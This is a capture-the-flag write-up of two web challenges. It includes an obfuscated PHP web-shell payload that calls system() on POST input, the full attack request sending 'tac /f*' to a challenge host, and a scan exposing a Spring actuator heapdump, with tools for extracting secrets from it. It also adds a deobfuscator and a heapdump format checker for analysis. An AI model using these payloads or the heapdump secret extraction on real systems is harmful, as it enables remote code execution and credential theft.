I didn't really want to look at this one, but the group chat kept going on about it, so could it actually be that interesting?
Execute

```php
<?php
$a = 'edoced_46esab';
$b = strrev($a);             // 'base64_decode'

$d = 'c3~@#@#@lz!@dGVt';
$s = $b($d);                 // non-strict base64_decode drops the junk: 'c3lzdGVt' -> 'system'

echo $s;
$s($_POST[1]);               // system($_POST[1])

$e = 'php';
$f = 'in';
$w = 'fo';
$g = $e . $f . $w;           // 'phpinfo'
$g();
?>
```
```http
POST /execute.php HTTP/1.1
Host: 39.106.16.204:44099
Origin: http://39.106.16.204:44099
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://39.106.16.204:44099/
Accept-Encoding: gzip, deflate
Content-Length: 216

code=%3C%3Fphp%0A%24a%20%3D%20'edoced_46esab'%3B%0A%24b%20%3D%20strrev(%24a)%3B%0A%0A%24d%20%3D%20'c3~%40%23%40%23%40lz!%40dGVt'%3B%0A%24s%20%3D%20%24b(%24d)%3B%0A%0Aecho%20%24s%3B%0A%24s(%24_POST%5B1%5D)%3B%0A%3F%3E&1=tac /f*
```

Decoded, `code` is the script above without the phpinfo() tail, and parameter `1` is the command it hands to system(): `tac /f*`.
No pressure at all, solved it in seconds.
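As an added example (my own code, not part of the writeup), here is a small static deobfuscator for the payload above: it decodes the form body, replays the PHP assignments with an emulation of PHP's non-strict `base64_decode()` (which silently drops every character outside the base64 alphabet, the trick that turns `c3~@#@#@lz!@dGVt` into `system`), and reports which function each variable-based call ends up invoking and with what argument. The request body it ships with is a constructed copy of the one in the writeup, with the `phpinfo()` tail from the first listing appended; `analyse_request`, `deobfuscate` and `resolve` are names I chose.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed request body: the writeup's PHP payload (including the phpinfo()
# tail from its first listing) in the shape of the POST it sent, with the
# URL-encoding repaired. Parameter "1" carries the shell command.
SAMPLE_BODY = (
    "code=%3C%3Fphp%0A%24a%20%3D%20'edoced_46esab'%3B%0A%24b%20%3D%20strrev(%24a)%3B"
    "%0A%0A%24d%20%3D%20'c3~%40%23%40%23%40lz!%40dGVt'%3B%0A%24s%20%3D%20%24b(%24d)%3B"
    "%0A%0Aecho%20%24s%3B%0A%24s(%24_POST%5B1%5D)%3B%0A%24e%3D'php'%3B%24f%3D'in'%3B"
    "%24w%3D'fo'%3B%24g%3D%24e.%24f.%24w%3B%24g()%3B%0A%3F%3E&1=tac /f*"
)

B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")


def php_base64_decode(s: str) -> str:
    """Emulate PHP's default, non-strict base64_decode(): every character
    outside the base64 alphabet is discarded before decoding, so the junk in
    'c3~@#@#@lz!@dGVt' vanishes and 'c3lzdGVt' decodes to 'system'."""
    clean = "".join(ch for ch in s if ch in B64_ALPHABET)
    clean += "=" * (-len(clean) % 4)  # Python requires padding, PHP does not
    return base64.b64decode(clean).decode("latin-1")


# The only builtins this obfuscation style needs; extend as payloads require.
BUILTINS = {"strrev": lambda s: s[::-1], "base64_decode": php_base64_decode}


def resolve(expr: str, env: dict) -> str:
    """Evaluate the tiny PHP expression subset these payloads use: single-
    quoted literals, variables, '.' concatenation, and calls to a builtin
    either by name (strrev($a)) or through a variable ($b($d))."""
    expr = expr.strip()
    if m := re.fullmatch(r"'([^']*)'", expr):
        return m.group(1)
    if m := re.fullmatch(r"\$(\w+)", expr):
        return env[m.group(1)]
    if m := re.fullmatch(r"(\$?\w+)\s*\((.*)\)", expr, re.S):
        callee = m.group(1)
        fn = resolve(callee, env) if callee.startswith("$") else callee
        return BUILTINS[fn](resolve(m.group(2), env))
    if "." in expr:
        return "".join(resolve(part, env) for part in expr.split("."))
    raise ValueError(f"unsupported expression: {expr!r}")


def deobfuscate(php: str) -> dict:
    """Replay the assignments in order, then list every call made through a
    variable ($s(...), $g()) with the function name it resolves to."""
    env: dict = {}
    for name, expr in re.findall(r"\$(\w+)\s*=\s*([^;]+);", php):
        env[name] = resolve(expr, env)
    dynamic_calls = {}
    for var, arg in re.findall(r"\$(\w+)\s*\(\s*([^)]*)\)\s*;", php):
        if var in env:
            dynamic_calls[env[var]] = arg.strip()
    return {"env": env, "dynamic_calls": dynamic_calls}


def analyse_request(body: str) -> dict:
    """Decode the form body, deobfuscate the `code` parameter and tie each
    $_POST[key] argument back to the value the request actually carried."""
    params = parse_qs(body, keep_blank_values=True)
    report = deobfuscate(params["code"][0])
    resolved = {}
    for callee, arg in report["dynamic_calls"].items():
        m = re.fullmatch(r"\$_POST\[\s*'?(\w+)'?\s*\]", arg)
        resolved[callee] = params[m.group(1)][0] if m else arg
    report["resolved_calls"] = resolved
    return report


if __name__ == "__main__":
    for fn, arg in analyse_request(SAMPLE_BODY)["resolved_calls"].items():
        print(f"{fn}({arg!r})")
```

Run it on the constructed body and it reports `system('tac /f*')` and `phpinfo('')`, which is exactly what the server executes. The expression evaluator is deliberately limited to the handful of constructs this payload family uses; anything else raises instead of guessing.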
EzLogin

No obvious way in, so start with a scan.
```
└─$ dirsearch -u http://39.106.16.204:61457/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_39.106.16.204_61457/__25-05-22_00-39-07.txt

Target: http://39.106.16.204:61457/

[00:39:07] Starting:
[00:39:14] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:39:14] 404 - 96B - /;/login
[00:39:15] 400 - 435B - /a%5c.aspx
[00:39:15] 404 - 111B - /actuator/;/auditevents
[00:39:15] 404 - 105B - /actuator/;/beans
[00:39:15] 404 - 108B - /actuator/;/auditLog
[00:39:15] 404 - 110B - /actuator/;/conditions
[00:39:15] 200 - 2KB - /actuator
[00:39:15] 404 - 106B - /actuator/;/caches
[00:39:15] 404 - 111B - /actuator/;/configprops
[00:39:15] 404 - 121B - /actuator/;/configurationMetadata
[00:39:15] 404 - 104B - /actuator/;/dump
[00:39:15] 404 - 108B - /actuator/;/features
[00:39:15] 404 - 106B - /actuator/;/health
[00:39:15] 404 - 111B - /actuator/;/healthcheck
[00:39:15] 404 - 124B - /actuator/;/exportRegisteredServices
[00:39:15] 404 - 106B - /actuator/;/flyway
[00:39:15] 404 - 103B - /actuator/;/env
[00:39:15] 404 - 106B - /actuator/;/events
[00:39:15] 404 - 108B - /actuator/;/heapdump
[00:39:15] 404 - 109B - /actuator/;/httptrace
[00:39:15] 404 - 104B - /actuator/;/info
[00:39:15] 404 - 107B - /actuator/;/jolokia
[00:39:15] 404 - 107B - /actuator/;/logfile
[00:39:15] 404 - 116B - /actuator/;/integrationgraph
[00:39:15] 404 - 109B - /actuator/;/liquibase
[00:39:15] 404 - 108B - /actuator/;/mappings
[00:39:15] 404 - 113B - /actuator/;/loggingConfig
[00:39:15] 404 - 107B - /actuator/;/refresh
[00:39:15] 404 - 117B - /actuator/;/releaseAttributes
[00:39:15] 404 - 107B - /actuator/;/loggers
[00:39:15] 404 - 107B - /actuator/;/metrics
[00:39:15] 404 - 110B - /actuator/;/prometheus
[00:39:15] 404 - 118B - /actuator/;/registeredServices
[00:39:16] 404 - 113B - /actuator/;/springWebflow
[00:39:16] 404 - 103B - /actuator/;/sso
[00:39:16] 404 - 110B - /actuator/;/statistics
[00:39:16] 404 - 102B - /actuator/dump
[00:39:16] 404 - 108B - /actuator/;/sessions
[00:39:16] 404 - 110B - /actuator/;/threaddump
[00:39:16] 404 - 117B - /actuator/;/resolveAttributes
[00:39:16] 404 - 114B - /actuator/;/scheduledtasks
[00:39:16] 404 - 106B - /actuator/;/status
[00:39:16] 404 - 108B - /actuator/;/shutdown
[00:39:16] 404 - 119B - /actuator/configurationMetadata
[00:39:16] 404 - 109B - /actuator/auditevents
[00:39:16] 404 - 111B - /actuator/;/ssoSessions
[00:39:16] 404 - 104B - /actuator/events
[00:39:16] 404 - 106B - /actuator/auditLog
[00:39:16] 404 - 122B - /actuator/exportRegisteredServices
[00:39:16] 404 - 105B - /actuator/;/trace
[00:39:16] 404 - 107B - /actuator/httptrace
[00:39:16] 404 - 104B - /actuator/flyway
[00:39:16] 404 - 114B - /actuator/integrationgraph
[00:39:16] 404 - 112B - /actuator/gateway/routes
[00:39:16] 404 - 109B - /actuator/healthcheck
[00:39:16] 200 - 20B - /actuator/caches
[00:39:16] 404 - 105B - /actuator/jolokia
[00:39:16] 404 - 106B - /actuator/features
[00:39:16] 404 - 105B - /actuator/logfile
[00:39:16] 404 - 107B - /actuator/liquibase
[00:39:16] 200 - 2B - /actuator/info
[00:39:16] 404 - 115B - /actuator/resolveAttributes
[00:39:16] 404 - 111B - /actuator/loggingConfig
[00:39:16] 404 - 105B - /actuator/refresh
[00:39:16] 404 - 106B - /actuator/shutdown
[00:39:16] 404 - 106B - /actuator/sessions
[00:39:16] 404 - 116B - /actuator/registeredServices
[00:39:16] 404 - 108B - /actuator/prometheus
[00:39:16] 404 - 115B - /actuator/releaseAttributes
[00:39:16] 404 - 108B - /actuator/management
[00:39:16] 404 - 111B - /actuator/springWebflow
[00:39:16] 200 - 8KB - /actuator/env
[00:39:16] 404 - 104B - /actuator/status
[00:39:16] 200 - 1018B - /actuator/metrics
[00:39:16] 200 - 93KB - /actuator/beans
[00:39:16] 404 - 108B - /actuator/statistics
[00:39:16] 404 - 103B - /actuator/trace
[00:39:16] 404 - 101B - /actuator/sso
[00:39:16] 404 - 109B - /actuator/ssoSessions
[00:39:16] 404 - 112B - /actuator/hystrix.stream
[00:39:16] 200 - 54B - /actuator/scheduledtasks
[00:39:16] 200 - 49KB - /actuator/loggers
[00:39:17] 200 - 22KB - /actuator/mappings
[00:39:17] 200 - 268B - /actuator/health
[00:39:17] 200 - 99KB - /actuator/conditions
[00:39:17] 200 - 197KB - /actuator/threaddump
[00:39:17] 200 - 33MB - /actuator/heapdump
[00:39:18] 200 - 14KB - /actuator/configprops
[00:39:32] 404 - 102B - /images/README
[00:39:32] 404 - 103B - /images/c99.php
[00:39:32] 404 - 103B - /images/Sym.php
[00:39:35] 200 - 11KB - /login
[00:39:35] 200 - 11KB - /login/
```
The heapdump endpoint is exposed. Download it first, then process it with a proper tool instead of going caveman with `strings`:

https://github.com/wyzxxz/heapdump_tool
https://github.com/whwlsfb/JDumpSpider

The first tool did not work for me, though.
```shell
java -jar heapdump_tools.jar C:\Users\baozhongqi\Desktop\heapdump2
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump2
```
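Before handing a downloaded heapdump to either of those tools, it is worth confirming that what came back from `/actuator/heapdump` is actually an HPROF file and that its record stream is intact. The following checker is an added example of my own, not code from the writeup or from either tool; the tag values and header layout are those of the HPROF binary format the JDK writes, and `build_sample_hprof` produces a constructed, synthetic file for offline testing (it contains no real heap data). Note the caveat in the docstring: the UTF8 records this walker decodes are the symbol table (class, field and method names), not the contents of `java.lang.String` objects. The secret values themselves sit inside the heap-dump segments, which is what the dedicated tools dig through.

```python
import struct
import sys
from collections import Counter

# Top-level record tags from the HPROF binary format (JDK hprof spec).
TAG_NAMES = {
    0x01: "UTF8", 0x02: "LOAD_CLASS", 0x03: "UNLOAD_CLASS", 0x04: "FRAME",
    0x05: "TRACE", 0x06: "ALLOC_SITES", 0x07: "HEAP_SUMMARY", 0x0A: "START_THREAD",
    0x0B: "END_THREAD", 0x0C: "HEAP_DUMP", 0x0E: "CPU_SAMPLES",
    0x0F: "CONTROL_SETTINGS", 0x1C: "HEAP_DUMP_SEGMENT", 0x2C: "HEAP_DUMP_END",
}
HEADER_TAIL = struct.Struct(">IQ")   # u4 identifier size, u8 timestamp (ms)
RECORD_HEAD = struct.Struct(">BII")  # u1 tag, u4 time delta, u4 body length


def parse_hprof(data: bytes) -> dict:
    """Walk the top-level record stream of an HPROF file and summarise it.

    Layout: NUL-terminated "JAVA PROFILE 1.0.x", identifier size, timestamp,
    then a sequence of (tag, time, length, body) records. Only the UTF8
    records are decoded here; they are the symbol table (class, field and
    method names), NOT the contents of java.lang.String objects, which live
    inside the HEAP_DUMP(_SEGMENT) bodies this walker merely measures."""
    if data[:2] == b"\x1f\x8b":
        raise ValueError("gzip-compressed input; decompress it first")
    nul = data.find(b"\x00", 0, 32)
    if nul < 0 or not data[:nul].startswith(b"JAVA PROFILE"):
        raise ValueError("not an HPROF file (bad magic)")
    version = data[:nul].decode("ascii")
    id_size, ts_ms = HEADER_TAIL.unpack_from(data, nul + 1)
    if id_size not in (4, 8):
        raise ValueError(f"implausible identifier size {id_size}")
    pos = nul + 1 + HEADER_TAIL.size
    tags, symbols, heap_bytes = Counter(), {}, 0
    while pos + RECORD_HEAD.size <= len(data):
        tag, _delta, length = RECORD_HEAD.unpack_from(data, pos)
        body = data[pos + RECORD_HEAD.size: pos + RECORD_HEAD.size + length]
        if len(body) != length:
            raise ValueError(f"truncated record tag=0x{tag:02x} at offset {pos}")
        tags[TAG_NAMES.get(tag, f"0x{tag:02x}")] += 1
        if tag == 0x01:
            sid = int.from_bytes(body[:id_size], "big")
            symbols[sid] = body[id_size:].decode("utf-8", "replace")
        elif tag in (0x0C, 0x1C):
            heap_bytes += length
        pos += RECORD_HEAD.size + length
    if pos != len(data):
        raise ValueError("trailing bytes after the last complete record")
    return {"version": version, "id_size": id_size, "timestamp_ms": ts_ms,
            "records": dict(tags), "symbols": symbols, "heap_bytes": heap_bytes}


def build_sample_hprof(id_size: int = 8) -> bytes:
    """Construct a minimal, well-formed HPROF stream for offline testing. It
    is synthetic: two symbols, one class load, one opaque heap segment."""
    def rec(tag: int, body: bytes) -> bytes:
        return RECORD_HEAD.pack(tag, 0, len(body)) + body

    def ident(n: int) -> bytes:
        return n.to_bytes(id_size, "big")

    out = b"JAVA PROFILE 1.0.2\x00" + HEADER_TAIL.pack(id_size, 1_700_000_000_000)
    out += rec(0x01, ident(0x10) + b"java/lang/String")
    out += rec(0x01, ident(0x11) + b"secretKey")  # a field *name*, not its value
    # LOAD_CLASS: u4 class serial, class object ID, u4 stack trace serial, name ID
    out += rec(0x02, struct.pack(">I", 1) + ident(0x20) + struct.pack(">I", 0) + ident(0x10))
    out += rec(0x1C, b"\x00" * 64)  # heap segment; its contents are irrelevant here
    out += rec(0x2C, b"")
    return out


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        summary = parse_hprof(fh.read())
    print({k: v for k, v in summary.items() if k != "symbols"},
          len(summary["symbols"]), "symbols")
```

Usage: `python hprof_check.py heapdump2`. A clean walk to the end of the file with a HEAP_DUMP_END record and a plausible `heap_bytes` total means the download is a complete dump; an HTML error page, a gzip stream or a cut-off transfer is reported as a `ValueError` instead of being silently fed to the next tool.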
Once you have the key, just throw the tool at it in one go. If it does not work the first time, keep clicking; mashing buttons will get it out eventually, unless the tool itself is broken.